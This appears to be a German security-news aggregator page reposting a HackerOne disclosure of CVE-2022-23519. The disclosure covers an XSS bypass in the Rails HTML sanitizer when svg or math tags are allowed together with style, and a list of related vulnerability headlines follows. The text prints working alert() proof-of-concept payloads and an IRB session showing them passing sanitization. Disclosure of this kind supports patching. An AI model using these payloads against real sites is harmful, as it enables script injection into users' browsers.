Lädt...


🕵️ Internet Bug Bounty: CVE-2022-23519: Rails::Html::SafeListSanitizer vulnerable to XSS when certain tags are allowed (math+style || svg+style)


Nachrichtenbereich: 🕵️ Sicherheitslücken
🔗 Quelle: vulners.com


image
The following is from: https://hackerone.com/reports/1656627 Intro The Rails HTML sanitzier allows to set certain combinations of tags in it's allow list that are not properly handled. Similar to the report 1530898, which identified the combinationselect and style as vulnerable, my fuzz testing from today suggests that also svg and style as well as math and style allow XSS. The following are PoCs for each of these allow list: - svg and style: <svg><style><script>alert(1)</script></style></svg> - math and style: <math><style><img src=x onerror=alert(1)></style></math> See the following IRB session: irb(main):016:0> require 'rails-html-sanitizer' => false irb(main):017:0> Rails::Html::SafeListSanitizer.new.sanitize("<svg><style><script>alert(1)</script></style></svg>", tags: ["svg", "style"]).to_s => "<svg><style><script>alert(1)</script></style></svg>" irb(main):018:0> Rails::Html::SafeListSanitizer.new.sanitize("<math><style><img src=x onerror=alert(1)></style></math>", tags: ["math", "style"]).to_s => "<math><style><img src=x onerror=alert(1)></style></math>" irb(main):019:0> puts Rails::Html::Sanitizer::VERSION 1.4.3 => nil Sample Vulnerable Rails Application To build a sample rails application that is vulnerable, I've used the following Dockerfile: ``` FROM ruby:3.1.2 RUN apt-get update && apt-get install -y vim WORKDIR /usr/src/app RUN gem install rails && rails new myapp WORKDIR /usr/src/app/myapp COPY build-rails-app.sh ./build-rails-app.sh RUN sh... ...

🕵️ Internet Bug Bounty: Rails ActionView sanitize helper bypass leading to XSS using SVG tag.


📈 38.68 Punkte
🕵️ Sicherheitslücken

🕵️ Internet Bug Bounty: ReDoS (Rails::Html::PermitScrubber.scrub_attribute)


📈 35.75 Punkte
🕵️ Sicherheitslücken

🕵️ Xbox bug could have allowed hackers to link gamer tags with players' emails


📈 32.77 Punkte
🕵️ Hacking

🕵️ WordPress <= 5.2.3 - Stored XSS in Style Tags


📈 31.83 Punkte
🕵️ Sicherheitslücken

🕵️ A way to create a stored XSS to inject Javascript into style tags


📈 31.83 Punkte
🕵️ Sicherheitslücken

📰 XSS-LOADER - XSS Payload Generator / XSS Scanner / XSS Dork Finder


📈 30.32 Punkte
📰 IT Security Nachrichten

🕵️ Ruby on Rails 3.0/4.0 rails-html-sanitizer Cross Site Scripting


📈 29.3 Punkte
🕵️ Sicherheitslücken

🕵️ Ruby on Rails 3.0/4.0 rails-html-sanitizer Cross Site Scripting


📈 29.3 Punkte
🕵️ Sicherheitslücken

🕵️ Ruby on Rails 3.0/4.0 rails-html-sanitizer Cross Site Scripting


📈 29.3 Punkte
🕵️ Sicherheitslücken

🕵️ Ruby on Rails 3.0/4.0 rails-html-sanitizer Cross Site Scripting


📈 29.3 Punkte
🕵️ Sicherheitslücken

🕵️ Ruby on Rails 3.0/4.0 rails-html-sanitizer Cross Site Scripting


📈 29.3 Punkte
🕵️ Sicherheitslücken

🕵️ Ruby on Rails 3.0/4.0 rails-html-sanitizer Cross Site Scripting


📈 29.3 Punkte
🕵️ Sicherheitslücken

🕵️ Piwigo bis 2.9.2 Administration Panel admin/tags.php tags SQL Injection


📈 28.8 Punkte
🕵️ Sicherheitslücken

🕵️ Piwigo up to 2.9.2 Administration Panel admin/tags.php tags sql injection


📈 28.8 Punkte
🕵️ Sicherheitslücken

📰 LinkDesk Smart Tags vorgestellt: Schicke NFC-Tags mit App-Anbindung


📈 28.8 Punkte
📰 IT Nachrichten

📰 LinkDesk Smart Tags vorgestellt: Schicke NFC-Tags mit App-Anbindung


📈 28.8 Punkte
📰 IT Nachrichten

🕵️ Internet Bug Bounty: Undici ProxyAgent vulnerable to MITM


📈 28.21 Punkte
🕵️ Sicherheitslücken

🎥 [Bug Bounty Hacker] Yahoo Bug Bounty Program 2016 - Sender Spoofing Vulnerability


📈 28.14 Punkte
🎥 IT Security Video

🎥 Ebay Inc Bug Bounty Magento Commerce Bug Bounty - Persistent Cross Site Scripting Vulnerability


📈 28.14 Punkte
🎥 IT Security Video

📰 Naked Security Live – When is a bug bounty not a bug bounty?


📈 28.14 Punkte
📰 IT Security Nachrichten

🕵️ Bug Bounty Platforms [Best Choices For a Bug Bounty Program]


📈 28.14 Punkte
🕵️ Hacking

🕵️ Bug Bounty Benefits | Why You Need a Bug Bounty Program


📈 28.14 Punkte
🕵️ Hacking

matomo